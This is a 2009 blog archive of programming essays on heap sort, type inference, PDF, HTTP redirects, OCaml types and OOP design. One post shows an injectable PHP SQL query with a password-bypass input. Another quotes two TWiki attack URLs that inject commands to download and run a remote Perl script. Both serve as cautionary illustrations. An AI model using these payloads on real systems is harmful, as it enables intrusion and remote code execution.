Monthly Archive for January, 2009

Heaps of Knowledge

A question I like to ask for evaluating programming skill is, “Implement Heap Sort” (in whatever language I need programming in).

Heap sort looks something like this (the example is in C++, but the implementation is fairly similar in just about any imperative language):

void swap(int &a, int &b) {
  int c = a;
  a = b;
  b = c;
}

void sift(int *data, int i, int size) {
  int l = i * 2 + 1, r = l + 1;
  int argmax = i;
  if (l < size && data[argmax] < data[l]) argmax = l;
  if (r < size && data[argmax] < data[r]) argmax = r;
  if (argmax != i) {
    swap(data[i], data[argmax]);
    sift(data, argmax, size);
  }
}

void heapsort(int *data, int size) {
  for (int i = (size-1)/2; i >= 0; --i) sift(data,i,size);
  for (int i = size; i >= 2; --i) {
    swap(data[i-1],data[0]);
    sift(data,0,i-1);
  }
}

This short version requires some experience to get right, as well as knowledge of the algorithm. I suspect that a large number of programmers have never heard of heap sort, and of those who have heard of it, few will know how to implement it on their own. Of course, if you ask someone who knows how to write, you will usually get a pleasant surprise. But most of the time, you’ll be facing someone who just doesn’t know the answer. That’s the entire point: what people know is important, but it’s far more important to know how people will react when they don’t know (and especially, how quickly they can learn).

If the programmer doesn’t know what heap sort is, you can nudge him in the right direction by explaining how heap sort works. Basically, heap sort is an improvement over the naive selection sort: instead of simply extracting the maximum element from the unsorted area in the array, heap sort turns the unsorted area into a heap—a binary tree where the root is the maximum element of the tree and each sub-tree is also a heap—thereby making extraction of a maximum a Θ(log n) task instead of the usual Θ(n). The trick behind heap sort is that the unsorted area of the array can be seen as a heap, by deciding that every index in the array is a node in the tree, with the left child being at index (2n+1) and the right child being at index (2n+2).

From there, it’s fairly elementary to deduce that the algorithm should first turn the entire array into a heap, then remove the first element, restore the heap, and repeat the process until the heap is empty. The sift function itself should be guessed fairly easily by anyone with any experience in recursive functions (it is, after all, merely a question of constructing a large heap from two smaller heaps).

The benefits I see to the question are:

  • See how the interviewee or student handles a situation where he has no idea about how to answer a question. Do they stare without saying a word? Do they get angry at an impossible question? Or do they admit they don’t know, and try to gather more information?
  • Determine how much general Computer Science knowledge the candidate has. As you explain Heap Sort, do they already know what heaps and selection sort are? Do they have to ask what a binary tree is? Do they have to ask what an array or a sort is, or how to swap two values?
  • Detect positive laziness and knowledge of standard libraries. Does the candidate mention they’d use the standard library sort in production code? In C++, do they already know of std::make_heap or std::swap?
  • Test basic knowledge of recursion and iteration. Does the interviewee ‘get’ the principle of sifting on the first try? Are the bounds for the two for-loops correct? Can the interviewee evaluate the complexity of the function?
  • Test basic knowledge of the language idioms. Are the functions declared correctly? Are the control structures used correctly? Is the choice of a storage type appropriate for the array?

You’re Not My Type

Consider an extremely simple language. For instance, a language that only has boolean and integer values. You could write, say, MacCarthy’s 91 function with it:

def maccarthy(n):
  if n <= 100
    maccarthy(maccarthy(n+11))
  else
    n - 10

Type-checking this language would be trivially easy, even if you don’t have any type annotations. You’d just have to check whether a given expression is used as an integer, a boolean, neither, or both (and throw an exception in the “both” case). Here, for instance, the operation “n <= 100″ would constrain “n” as an integer and the operation “n-10″ would constrain the return type as an integer, then the various type constraints would be verified for all other expressions.

Requirements and Properties

Static verification involves determining, for every static piece of code (usually, at the expression level):

  • The requirements that allow the code to run correctly. For instance, the fact that a certain value needs to be comparable, that a certain value must be of the same type as another, or that a certain value must be an object with a certain member.
  • The properties that are provided by that code. For instance, the fact that a certain expression always evaluates to an integer, that it always evaluates to an object with a certain member, or that it’s always equal to 91.

In its simplest form, the algorithm would determine the entire set of requirements and properties, and then determine whether the properties satisfy the requirements. For instance, if a variable does not have the “is an integer” property but is subject to a “must be an integer” requirement, the verification fails and indicates the error.

This is the approach used in languages with explicit type annotations, such as C. There, whenever a value is created, its properties are known (whether by the type annotation in its definition or because of the return type of the function that returned it), and whenever it is used its requirements are known (whether by the type annotations of the called function parameters, of the current function’s returned value, or because of a syntactic requirement such as the condition in an ‘if’ statement). And so, starting with the parameters and ending with the return value, the properties for every sub-expression in every function’s body are deduced and then verified.

Of course, the version used in C++ is more complex than that. For instance, the “property satisfies requirement” rule is not a simple yes-no question, but instead has several levels of priority involving implicit conversions, built-in conversions and user-defined conversions (for instance, the property “is an integer” satisfies the “must be a floating-point number“, but with a lower priority than “must be an integer“) in order to resolve overloading and template functions. But the general idea remains the same.

Type Inference

The issue with this simple approach is that it requires annotations—the code deduces properties from type annotations, so the types of all function parameters must be specified. The return type specification can be deduced in some cases (for instance, if there is only one return statement, or if all return statements return the exact same type), and the type of local variables can be deduces from the function or expression used to initialize them. So, you would be left with a “type-inferred” language where the only type annotations ever required (outside of type definitions themselves) would be for function parameters.

It’s also possible to get rid of these type annotations, but it requires an entirely different algorithm : since you don’t know what are the properties of your function parameters, how can you determine whether they satisfy the requirements within your function?

This could be done by allowing the static checker to generate properties based on the requirements that must be satisfied. Of course, that doesn’t tell us how this could be done and, in the general case, it cannot be done. Consider C++ overloading: if a function is overloaded for both integer and vector arguments, then should its argument be an integer or a vector? Introducing an “is an integer or a vector” property is impractical in most cases, and it doesn’t tell the code generator whether that variable is a one-register integer or an SSE-friendly vector—a fatal flaw.

So, full type-inference algorithms only apply in languages with type systems that allow deducing properties from requirements. One example would be the ML type system, which merges properties and requirements together in a single concept of “type”. Since in that system a requirement is a property, there’s no difficulty determining what property a requirement corresponds to.

This means that every operation is not a top-down “I deduce the result from the arguments” process, but rather a two-way “I connect the types of the result and the arguments”. The connection can be, for instance, a type equality (being equal to a certain type, or to the type of another expression), as is the case for the equality operator: if you compare two expressions, then their types are constrained to be equal to each other, which means that in the example below the type of x would be properly inferred as being an integer:

let is_zero x =
  x = 0
;;

This system works pretty well as long as you don’t have types that are too complex. However, any serious language has to handle containers (quite often, functions and objects as well), and these can cause some issues with what has been done so far.

Parametric Types

PHP’s approach to types is pretty straightforward. You have a short list of possible types:

Integer, Floating-Point, Boolean, String, Object, Array, Resource and NULL.

Every single value manipulated inside a PHP program has exactly one type among the above. This makes the language quite simple to grasp, but makes compile-time type-safety impossible to achieve: even if you know the compile-time types of a handful of objects (such as function parameters and return values), you still have no guarantees about what type of objects an array holds, or whether an object has a certain member (and if it does, what its type is), because that information is not part of the extremely simple type system in PHP.

The array problem is usually solved by adding parametric types to the language: instead of an object being an “Array“, the object instead becomes an “Array of X“. This allows the compiler to determine the type of the objects inside the array (if it’s an “Array of X“, then the type of the element is X). Most languages with a static type system (C, C++, Java, C#, OCaml, Haskell to name a few) implement arrays as parametric types.

Some languages stop there: they add only a handful of built-in parametric types (C pointers and arrays) and rely on user-defined types for handling everything else. Other languages push it a step forward and introduce generics or generic-like constructs (C++ templates, Java and C# generics). And yet other languages use parametric types to their full extent to deduce one type from another both ways (OCaml, Haskell).

The ML type system supports parametric types. In fact, because of the way it’s defined, it works because of parametric types. Every final ML type (that is, those types of values that actually end up appearing in the running program) is a formal construct, a tree where every node is a type name and the children of that node represent the value of the type parameters (types with no type parameters are leaves). For instance, an array of integer pairs is described as:

(int * int) array

Or, as a tree-like structure:

[ int ]--
         |--[ * ]---[ array ]
[ int ]--/

The type-checking system allows “unknown” types: these are types which have no constraints and are therefore universal. They are usually represented as quoted type names. For instance, an array of pairs of unknown types:

[ 'a ]--
        |--[ * ]---[ array ]
[ 'b ]--/

Or, in linear form:

('a * 'b) array

This type represents an array of pairs, but the types of the first and second elements are not constrained, so they show up as “anything”.

Type Unification

ML types work through unification. As explained above, every expression applies constraints to types. These are almost always equality constraints (explaining that two types are equal). For instance, I could decide that types (’a * int) array and (int * ‘b) array are equal, and the algorithm would determine that both types are in fact (int * int) array by noticing the ‘a = int and int = ‘b equality constraints. This is known as unification.

The unification process is a simple tree traversal process.

  1. Unification of two trees with different roots (that is, roots that have different names) is always an error. This is why you can’t unify an ‘a list with an ‘a array: the “list” root is incompatible with the “array” root.
  2. Unification of any tree with an unknown tree replaces the unknown tree with the other. This replacement happens everywhere within the program. This also happens if both trees are unknown, of course.
  3. Unification of two known trees with the same root resolves to recursive unification of children (so child N of the first tree is unified with child N of the second tree).

In practice, this means that the unification algorithm determines if there’s a tree that’s compatible with both unified trees (otherwise, there’s an error because you have two incompatible uses of a given value) and if there is one it selects the smallest (so that there are no additional assumptions made on the type beyond those of the two original ones).

Certain expressions perform unification between two existing types. Most expressions actually construct a new intermediary type and perform unification between that new type and other types. For instance:

  • if A then B else C” unifies A and bool, then unifies B and C, then unifies the expression’s type with B.
  • F A” unifies F with ‘a -> ‘b, unifies ‘a with A, and unifies the expression’s type with ‘b.
  • A.(I)” unifies A with ‘a array, unifies I with int, and unifies the expression’s type with ‘a.

Invalid Assumption

Yesterday, I stumbled across a DailyWTF article that showed overlooked errors, unsual bugs and other incorrect statements. At the bottom, a screenshot of a PDF containing a State of Georgia Department of Revenue form, with detailed instructions explaining how to download Adobe Reader. The irony of a document containing instructions on how to open it (something which would have already happened by the time the user read the instructions) is the reason for including that document on the DailyWTF website.

Is it really that obvious?

The Portable Document Format

Suppose for a moment that you’re not the Windows-using experienced developer you are (or you might be, if you read this blog or the DailyWTF). Perhaps you’re a hardcore Linux user who opens his Portable Document Format with xpdf instead of Adobe Reader (the document being portable is quite the point of the format). Or you might be using OS X. Or perhaps you’re running some older version of Adobe Reader than the 8.0 in the document.

This is where the real irony begins—despite being an open standard, advertised as being portable, PDF is not really that portable. Sure, you can open old PDF documents on any operating system with a large variety of readers from Adobe’s own to xpdf to evince to flash-based readers (courtesy of pdf2swf), not including the various conversion tools (to PostScript, to a bunch of PNG images, to HTML, to plain text).

But later versions of the PDF standard have introduced many features that few readers (aside from Adobe Reader) manage to support.

Taking a look at the standard (there’s a free version on Adobe’s web site) is an enlightening experience: what used to be a simplification of PostScript (mostly, removing the turing-complete parts of the language) has now included the ability to carry SWF, javascript for manipulating a DOM-like construct, user-entered data, digital signatures, and many other elements.

Consider, for instance, the ability to fill in a form in a PDF document. Chapter 12 in the PDF 1.7 standard tells us that this feature exists since PDF 1.2 (released in 1996 with Adobe Acrobat Reader 3.0). Obviously, most non-interactive renderers (such as converters) don’t support interactive features in PDF documents, of which forms are a part. But that’s also the case for some interactive viewers: xpdf, kpdf and evince users will see the form, but will not be able to fill it in.

Of particular interest is the way in which Adobe benefits from the wide distribution of its Adobe Reader, even though it is provided free of charge to anyone who wishes to download it. Aside from the elementary document-displaying functionality, which is reasonably well duplicated by other readers (including those from the Open Source world), Adobe Reader provides several pieces of locked functionality. Among these:

  • Saving a modified PDF file to the disk (including form field contents).
  • Applying a digital signature to a PDF file using the reader.
  • Sending a PDF file by e-mail from the reader (again, including form field contents).

The reader provides this functionality whenever it reads an “enabled” PDF file. One way of enabling files is to use the Livecycle Reader Extensions service (that tends to cost quite a lot), another is the smaller-scale Adobe Pro (a bit cheaper, but limited to 500 readers).

But wait, you think, if the format is open and the enabled/disabled status is part of the file, surely an open source PDF writer could enable files for free? Sadly, no, they couldn’t. While some features (such as signing a document outside of Adobe Reader) can be performed by anyone, enabling files cannot. To check if a file is enabled, Adobe Reader will determine whether the creator has signed the file with an appropriate private key—the details are a bit more complex, but that’s the idea—and so to enable a file you need that private key.

In short, Adobe is using a shareware-like model for distributing the Adobe Reader: you get a basic version for free, but to access the advanced features you have to pay. The difference with the standard shareware model is that “you”, in the above sentence, is not the user of the Adobe Reader software, but rather the author of the PDF that is read by that software.

What Does This Teach Us?

Two things:

  • Most assumptions that hold on an individual basis (on my computer, I use Acrobat Reader to open PDF documents) do not carry over well to other people. This is what leads to the “doesn’t work on other machines” portability issue, as well as many security issues when people cannot imagine that a hacker is going to use their program or website in a way they did not intend.
  • When someone does notice that an assumption is incorrect, and adds code to handle it, readers of that code will seldom understand on the first try what assumption is incorrect (precisely because, as an assumption, is it thought to be correct). Therefore, code handling some obscure detail will be thought as redundant and silly if it is not accompanied by a comment explaining why it’s actually necessary and not redundant.

The portability issue is annoying, but not horrible. After all, if you make an assumption that hinders portability, you will be woefully aware of that once you actually try to perform the port. By contrast, security issues are far more annoying. The classic issue would be SQL injection:

mysql_query("SELECT * FROM `users` ".
            "WHERE `id` = ".$_GET['user']." AND `password` = ".$_GET['pass']);

This code assumes that the GET-parameter will always be a valid user identifier. This may be fine if the visitors always come to the page after clicking on a link that contains a valid GET-parameter, but even an average hacker can forge an HTTP GET request with all an invalid GET-parameter such as ‘?user=13–” (this selects user 13 without password checks).

As for assuming that people are incorrect, I’d say there are three kind of developers:

  1. The young developer, who trusts everyone and accepts all the code as if it had been written by omniscient brain-gods.
  2. The experienced developer, who has learned that other developers are incompetent and warily examines all code as if it had been written by an epileptic chimpanzee.
  3. The wise developer, who has gone beyond mistrust into deep paranoia, and warily examines all code as if it had written by a sworn rival out to get him by placing devious traps in everything he commits.

Type 1 never notices bugs. Type 2 treats genuine corrections as bugs. Type 3 just spends too much time cross-checking everything to do any kind of work.

No single type is perfect, and in every team there will be a type that will be better than the others. If your team is highly competent, be a type 1 developer. If your team is highly incompetent, be a type 2 developer. If your team is a sworn rival out to get you, be a type 3 ;-)

Diagnosis

Ol’ Granma feels a bit tired. The doctor comes around, blinks twice, and tells you she has a rare case of reverse acquired acute osteopraxia.  Some days, I wish I could do the same with software.

Of course, there are some who say that Dijkstra managed to do so: he would peek at a student’s screen, sift through the code in a few seconds, and assert that there would be a bug if the program was used in a certain way. I certainly don’t doubt this: it’s often easy to see the errors in the code written by others, especially if they just finished writing it and didn’t have time to check it or test it.

But there are other errors that can be quite anoying. Consider, for instance, an error message from our dearest friend Alfresco the content management system:

org.alfresco.service.cmr.repository.TemplateException: Error during processing of the template ‘Error on line 42, column 91 in status.ftl
Expecting a string, date or number here, Expression exception.message is instead a freemarker.ext.beans.SimpleMethodModel’. Please contact your system administrator.
caused by:
freemarker.core.NonStringException: Error on line 42, column 91 in status.ftl
Expecting a string, date or number here, Expression exception.message is instead a freemarker.ext.beans.SimpleMethodModel

It appeared as I executed a Web Script—a piece of Javascript-and-Freemarker that runs inside the Java program itself—in my web browser. Despite being quite long and detailed, this error message does not contain interesting information. It actually makes three of the most fundamental mistakes in error reporting:

  • Bad technology level. This is a Java error (in fact, it’s precisely a Java exception report and the full call stack was available for viewing on the page). Yet, the error comes from a Freemarker template, not from Java. But I’m a homo sapiens, so I can gather that the actual error is actually the “Error on line 42, column 91 in status.ftl. Expecting a string, date or number here, Expression exception.message is instead a freemarker.ext.beans.SimpleMethodModel” part.
  • Vague references to files. Alfresco has the nasty habit of storing files everywhere. That status.ftl file could be within the repository itself, or it could be part of the alfresco WAR, or it could have been placed in any of the billion tiny locations in a typical Tomcat application server  your Alfresco will seep into unhindered if badly administrated. What I do know is that I’ve never written a status.ftl file myself, ever, so that certainly isn’t my fault! Now, I understand that the exception came from Freemarker, and Freemarker was told that the file’s name was status.ftl, but if you’re executing file foo/bar/qux/status.ftl and the processing fails, add the complete path to the exception or diagnosis message!
  • No references to documentation. There’s no link to an online documentation, manual page, book, wiki, relevant log on my server or even an error number that I could google. Sure, the contact your administrator line is fine, but what happens if you are the administrator and how do you start looking for solutions?

By the way, google-fu yields this link, which accurately solves the problem. This would be a hint that a badly worded error message isn’t always the end of the world (but this doesn’t make it better).

Of Recursive Types

Objective Caml supports recursive types out of the box, like most programming languages. A classic example is the tree, for instance to represent an expression:

type lambda =
  | Var of int
  | App of lambda * lambda
  | Abs of lambda

The problem is that such definitions are not very useful. Sure, they define a variant composite type that can be used to represent trees, but the nodes in those trees cannot be extended in any way. For instace, if you wanted to type-check a lambda-expression using the classic ruleset, and bind a type to every sub-expression, you would have no way of doing so because you cannot attach data to an existing value in Objective Caml.

What you would end up doing is something like this:

type lambda =
  | Var of int
  | App of term * term
  | Abs of term

and term  =
  {
    term_type : your_term_type ;
    term_form : lambda
  }

That’s better (you can now bind arbitrary data to every term) but you still have to change the original definition of your term if you need new data to be added.

One way of improving things is to give every term a unique identifier (and be stuck with the issue of generating unique identifiers, which is not a trivial thing to do once you need to account for child expressions depending on parent expressions and cloning). It can work, but I would advise against it.

My personal advice is to use this:

type 'term lambda =
  | Var of int
  | App of 'term * 'term
  | Abs of 'term

(* Somewhere else *)
type term =
  {
    term_type : your_term_type ;
    term_form : term lambda
  }

The variant is defined on its own, without any recursion, so that it may be used in any number of ways with different data associated. So, one module may use the recursive definition as a standalone type for marshaling, another may use the recursive definition with some information about whether an abstraction’s variable is used anywhere for better execution speed, and a third may also add type information or code generation information.

And you can even convert between the various definitions using a map-like (non-recursive) function that translates terms from one type to another!

Conclusion: separate concerns. Being a variant is one concern, being recursive is another. So, define the variant non-recursively, then define the recursion as part of another type (along with per-node additional data, if any).

Wiki Me Happy

For storing large collections of data and keeping them up to date, Wiki software is usually considered to be the superior option. The althernatives are either hard to navigate (Microsoft Office files) or difficult to modify (Manpages, PDF documents, compiled HTML).

The trouble with Wiki is that it’s usually intended for access by large audiences in read-write mode (one of the tenets of the Wiki philosophy is that if you don’t like what you read, you can edit it). So, the end result is software where managing users and permissions is very difficult, if not outright impossible. After a lot of searching with no obvious fail-safe way of being certain that I restricted users correctly, I gave up.

To say nothing of a sad experience I had with TWiki, accessing URLs of the form:

/twiki/bin/configure?action=image;image=|wget%20http://cvbeer.com/cvblog/xmlsrv/dc.txt|
/twiki/bin/configure?action=image;image=|perl%20dc.txt|

This managed to bring the server down with its knees (the wiki actually executed the commands it was provided with by some random internet hacker, and turned into a zombie).

Local Wiki

The idea of a local wiki, based on the user’s filesystem, struck me. This way, I could restrict users to getting only the files they’re allowed to use by harnessing the read/write rules of either a remote filesystem under my control or even a Subversion repository (thereby placing the wiki documentation within the project directory).

A quick web search later, I stumbled upon TiddlyWiki, which is a wiki system contained within a single HTML file. Javascript is used for extracting the pages and for navigation, as well as automatically saving the file back to the disk when it’s modified (Internet Explorer does make somewhat of a fuss over it, but as a whole it works as well).

Since it’s inside an HTML file, it can only be accessed and modified if the filesystem or SVN repository gives the user read-access and write-access, which solves the access problem by applying enough violence existing functionality. The issue of concurrent edits is also solved by using SVN, since the data is stored within the HTML file in a reasonable format, and can thus be merged by the canonical text diff/merge tools. Besides, the backup is completely trivial, and I can design a seed wiki from which new per-project wikis can be created at will simply by copy-pasting. Last but not least, I can always decide to filter critical information out of the wiki and put the result online for everyone to read.

So, use TiddlyWiki for internal project documentation.

No Wheat Please

Yesterday evening, while I dined at the traditional Japanese restaurant Higuma, I overheard a conversation a few tables away between a waiter and two guests.

One of the guests wanted to eat something without wheat—I couldn’t catch the exact reason—and the quick question turned into a long discussion of what wheat-less dish could be served at that restaurant. The question could seem an obvious one: a serving of sashimi (raw fish) shouldn’t contain any wheat.

Except that Higuma does not serve fish: it serves ramen (fried or normal noodles) and donburi (bowls of rice covered with pork, beef, chicken, egg, onion or ginger). Still, there must be some dish among these that doesn’t use any kind of wheat… or is there?

Both ramen and donburi contain meat. All meat is cooked in soy sauce. And soy sauce contains wheat. besides, the dishes are often served with some sauce based on soy sauce anyway. This doesn’t leave much room for dishes without wheat—I think the only one was cantonese rice (sans meat).

This must be what peanut allergy feels like.

A sprinkle of Logging

Don’t spill your soy sauce everywhere. The problem in the restaurant was that one couldn’t get anything to eat without having to eat wheat—in software engineering terms, there’s strong coupling between wheat and food. The same happens wherever strong coupling appears: nobody can use a module without also having to handle an entire heap of other modules along with it.

Every reasonaby encapsulated piece of code in a program has three kinds of dependencies.

  • Internal dependencies are those dependencies that are required for the module to work, but don’t require user intervention beyond simply adding them to a project. These can be annoying at setup time, but they cause no problems when developing or maintaining a project because they don’t leak out of the module.
  • Public dependencies are part of the module’s public interface, either explicitly (a function returns a 2D vector, therefore the module has a public dependency on 2D vectors) or implicitly (a function accesses the JAVA_HOME environment variable, therefore the module has a public dependency on that environment variable). These are annoying, because whenever one needs to work with the module, one also needs to take care of its public dependencies in the user code.
  • Parametric dependencies are specified for the module when it’s created or used. For instance, a serialization function depends neither on write-to-disk nor on write-to-socket code, but can use either when provided with them. These are the most flexible, but can also become annoying if there’s a lot of parametrization to be done before a module can be used.

All three are problematic (after all, the mere fact that you have to write code is a problem: ideally, you’d just install and configure an already-written piece of software), but some are more than others.

A global piece of state is a communication channel. As with all communication channels, it can be used anonymously (the receiver does not know who the sender is) or not (the receiver makes some assumptions about the sender).  The former is good, the latter is bad: when the receiver needs to assume things about the sender, strong coupling occurs which prevents the receiver from working independently or with other senders.

Expected Behavior

The HTTP is an old protocol that harkens back many years now (RFC 2616 dates from 1999 and the earlier RFC 2068 from 1997, with HTTP itself being used since around 1990s). It’s complex and subtle, so most web frameworks build layers of abstraction on top of it and many browsers and servers provide compatibility layers that can recover from common errors. The end result is that many unexperienced web developers are not familiar enough with it to use it correctly, and most mistakes are not obvious when they appear only on the web browsers the developer doesn’t use.

What is the intent of the POST message, for instance? The basic idea is that the user posts some data to a web site (for instance, a message on a forum), so the expected response is a description of the data that has been sent and the result of the sending. So, refreshing the page will perform the POST again with the same data to get a new response.

Web sites moved away from this system and caused POST messages to respond with data that was not related to the posting. For instance, posting login/password information responds with the home page of the logged in user, and posting a message on a forum responds with the new state of the forum thread. The result is that the user mistakenly believes that the current page is the result of a GET query, and that refreshing the page will simply perform a no-op query again (this is incorrect: since the page is the result of a POST, the POST will be performed again). Web browsers introduced a warning message to compensate for the web developer’s misuse of POST messages.

Another common useful abuse of the protocol is redirecting. The HTTP 1.0 protocol defines two main redirect modes: permanent (301) and temporary (302). For instance, when I moved this blog from Joomla! to Wordpress, I set up a 301 redirect for every URL on the old blog to the corresponding article on the new one (using appropriate URL rewriting rules in my Apache .htaccess): the intent of a 301 redirect is to indicate that the resource has been permanently moved to another location. This tends to be ignored by browsers, but online cache systems and search engines will use it to bind the old and new URLs together. On the other hand, if there’s some administration work underway on a web site, but some important documents must remain visible, a 302 redirect can be used to point to a temporary website on another server with the required documents.

Then, to avoid the “post the same data twice”, the web developers started using redirects. The POST message is received by the web server, which performs the modification (log in, add message to thread) then sends a 302 temporary redirect to the expected URL (the user home page, the thread page). For the user, the behavior on most browsers is that refreshing the destination page will only refresh the redirected part, not the original POST. Everyone wins.

Except the HTTP protocol specifies that in the case of a POST request, the redirection should not be done automatically (that is, the expected behavior would be for the browser to say “Hey, you just sent a POST message, and you’re being redirected to another URL, do you want to follow it?”). Oops.

The good news is that HTTP 1.1 added a new status code for redirects: 303 is a “See Other” redirect which means, mostly, that the request was successful, but there’s no relevant data to be displayed here so the browser should instead send a GET request to another URL. This is what a website should use to redirect a user to a display page after a POST request is received.

The bad news is that PHP developers tend to redirect using the header(”Location: “.NEW_URL) trick, which sets the status code to 302 by default. So, when you’re redirecting after an HTTP POST was received, don’t forget to also use header(”HTTP/1.1 303 See Other”) as well—after you’ve checked, of course, that the request allows the use of the HTTP/1.1 version instead of just HTTP/1.0!

Touchscreen Development

A touchscreen is a variation on the traditional screen-and-mouse combination for input-output. One of its main benefits is that aiming is easier when you can just point at things with your finger, which means interaction can be faster. One of its disadvantages is that there is no scale adjustment (you can move a mouse by one inch to move the cursor by a half inch, but one inch of your finger is always one inch of your touchscreen), which leads to increasing the size of buttons, and a larger user interface means a smaller area for displaying back information.

I’ve been looking around for touchscreen-centered development environments. Kodu comes close, since it’s able to work on a television screen with an Xbox 360 controller and could conceivably be controlled through finger pointing. Aside from that, however, I haven’t really found things worth mentioning (but I can certainly have missed some).

One direction I would like to see explored in greater depth is the area of visual (or nearly visual programming languages). For instance, something like:

These screenshots contain code blocks, where each block has a darker tab that serves as its header. Some blocks are short one-liners that only contain elementary code, so they’re on the same line as their header, whereas larger block are drawn below their header. Header colors mean:

  • Dark blue: top-level definitions, these appear as part of the current module.
  • Orange: conditional blocks. All such blocks are examined in order, the first one that matches is evaluated.
  • Light blue: for-loops, these define a new integer variable that traverses a range of integers.
  • Violet: nested definitions, these define a new variable bound to a specified value, and run some code with that binding.

All other code, in the white blocks, is actual code that is evaluated. A block’s value depends on the block type, with most blocks evaluating to their last line, and loops evaluating to an imperative ‘unit’ type.

The point of using blocks is to make the various elements stand out more for interaction, so that they are easier to identify and easier to touch.  The system supports four interaction modes: short presses, drag-and-drop, area select, and long presses. It also handles three distinct modes: view, edit and refactor. A short press on a block does the default action for that block, which depends on the current mode, for instance:

  • In edit mode, touching a dark blue, light blue or violet header inserts the variable defined by that header into the currently edited code.
  • In refactor mode, touching a dark blue, light blue or violet header selects that header for refactoring (it highlights and counts all occurences, and proposes a contextual menu for moving and renaming).
  • In view mode, touching a dark blue, light blue or violet header expands the definition itself. Touching any white block collapses that block. Touching the header of a white block expands that block back, and touching an expanded header collapses that header.

Drag-and-drop can be use to move things around. In view mode, it scrolls the screen. In edit and refactor mode, it moves blocks and lines. Area selection merely selects several touched areas. the difference between area selection and drag-and-drop is that area selection begins outside any blocks. Long presses bring up contextual menus for the activated block.

Done right, I believe this could improve the productivity of programmers by moving them away from the keyboard: not only is the physical speed itself faster, but selecting from a list has proven faster and less error-prone than typing out a name. Besides, automatic naming schemes could be found, for instance adding special documentation comments that suggests names for the return values of a function or the instances of a class.

An Object Philosophy : The Mindset

Last week, I discussed the main tools available in Object-Oriented Programming. If you haven’t already done so, I suggest that you read the article before starting.

A lot of OOP advocates (or compiler marketers, for that matter) state the main benefits of using it as being extensibility, maintainability, and reuse. Some would also add into the mix the ability to split up large problems into smaller problems, but functions have allowed precisely that for a long time, even in plain old modular but not object-oriented programming. Others mention the ease of gathering user requirements, but if your software architecture determines the way you gather requirements then I feel sorry for you regardless of what your methodology is—understanding the user requirements in terms of “I do this and this should happen” is the least you can do, and it’s architecture-independent.

The problem with such advocacy is that many are left with the impression that merely using the tools (classes, objects, methods) automatically yields the advertised benefits. Which, of course, isn’t the case. In fact, it’s a little worse than that: Object-Oriented Programming, in itself, is not fast to write. There’s the development time required to design each class, write the appropriate two-line functions to translate the various messages and send them to sub-objects, rewrite the parts that didn’t represent the solution appropriately, and so on. A lot of time, doing so is still a good idea because the benefits outweigh the costs. But if used improperly, a software project may be forced to bear the costs of using OOP without actually reaping the benefits, and that is usually a huge waste of time and resources.

I tend to believe that a developer becomes a good object-oriented developer the day he starts asking himself a simple question: “how?

So they say that using a class here will allow me to reuse code, decrease maintenance effort, and improve extensibility. How is this going to happen? Can I imagine a credible situation where this code can be successfully reused? What maintenance situation will benefit from this piece of code being a class? How will this class improve the extensibility of this code. All of these need practical answers, not theoretical “this is just what OOP does” circular reasoning.

Looking at the World

One of the earliest and most compelling arguments in favor of OOP is the fact that everyday humans think about the world in terms of objects. A table, a chair, a computer, a file, all of these are objects that have defined properties. So, it seems obvious to model real-life objects in terms of OO objects, if only to benefit from the modeling abilities of the developer’s brain.

This argument holds, to a degree. Humans are, indeed, better at manipulating black boxes where a lot of uninteresting details are abstracted away and a clean set of properties are selected and accessed. This is why encapsulation (placing all data and functions related to a concept in the same location) helps programmers work on larger programs: hidden information is information you don’t have to think about, and related things grouped together are things you won’t have to search for.

The analogy stops there, however. Real-life objects are incredibly complex: they have a shape, color, texture, aspect, granularity. Then, there’s the illumination, the weight, the speed, the position. Then, the various electrical currents and other energy flows going in and out of the object. Shape deformations. Elementary chemistry. Sound, smell and taste. Moving pieces. Ownership, authorship and other legal meta-information about the object. The end result is that, even though a simple rocket in a video game models a real-life object, most video games will separate it into a rendering sub-object, a local model object and a remote model object (to say nothing of audio and collision detection). That is, in order to be able to correctly manipulate objects, one has to split them into parts that are smaller than the average real-life object.

Another flaw in the analogy appears at the interaction level. Objects in the real world tend to evolve on their own in-between interactions with other objects (an egg thrown at a wall doesn’t need someone to push it along the way until it hits the wall) and have spontaneous symmetrical interactions with each other instead of messages propagating through an object graph.

Extending Software

Another strong point of Object-Oriented Programming is the ability to easily extend existing software. This is handy when, some time after the source code was originally written, additional requirements appear.

Changing or extending the behavior of a program invariably involves changing the code of that program, whether the program is object-oriented or not. Developers write some brand new code then some change the existing program so that it references and executes the new code—a few exceptions happen, such as when the entry point of the new code replaces (and calls) the entry point of the new code, but most of the time the old program has to be modified.

Avoiding modification of the old program is possible through polymorphism—and Object-Oriented Programming provides a tool to achieve polymorphism. The basic idea is that, instead of altering the program to take into account the new code, the program is changed to automatically take into account any piece of code it finds that fits certain requirements. In an object-oriented setting, this might mean using all objects that fit a certain interface. This is the basis of a plugin system: you don’t have to change the original program, you merely have to put the plugin code somewhere and change a configuration file to tell the program where to find the new plugin (you could also decide to use all the files in a certain location as plugins, but this can be a security risk).

So, if you want to add support for PDF generation to your application, and your application already supports several export plugins, then you can create and distribute the PDF generator as a plugin without having to alter and redistribute your original application.

However, this also happens on a smaller scale. Instead of working with entire programs, you work with functions or objects: nobody wants to change the code of an object, especially if that object is used in many locations in your program. So, again, polymorphism is used to allow a given object to interact with as many situations as possible: instead of expecting objects of a particular overly specific kind, the code merely expects an object that provides what is required to do the work.

The important element here is: every object and every function should be able to work in as many situations as possible. This often leads to massive use of interfaces: if a given piece of code requires that an object accepts a certain message, then it implicitly defines the interface of all objects it can work on as the objects accepting that message.

But that’s not all: sometimes, no matter how much effort you poured into writing extremely extensible objects, you run into a feature that just has to change a lot of code in order to work. This is where another benefit of Object-Oriented Programming can be helpful: encapsulation, or the ability to group together in small packages bits of related functionality. By storing together bits of code that depend on each other, changing one piece will usually alter other pieces within the same area, but leave alone the pieces elsewhere.

This, however, requires clever separation. Objects must be kept small: if there’s too much functionality in a given object, then any change will require a lot of work. By contrast, small objects can change more easily.

Reusing code

Reusing code is often seen as ripping out a class from a project and placing it in another. That’s an excellent situation that everyone wishes to be in. However, a lot of code has too many dependencies to simply be moved around like that, which has led many to conclude that code reuse is an utopia that cannot be reliably achieved with Object-Oriented Programming.

However, such a definition as moving code between projects is a bit too strong, and does not cover the ability to reuse code within the same project.

One does not need objects to reuse code that is already in the project—the code is usually grouped as part of functions, and you can always decide to call a function if you want to. What the Object-Oriented can provide, however, is a means of making such code useful in other parts of the project.

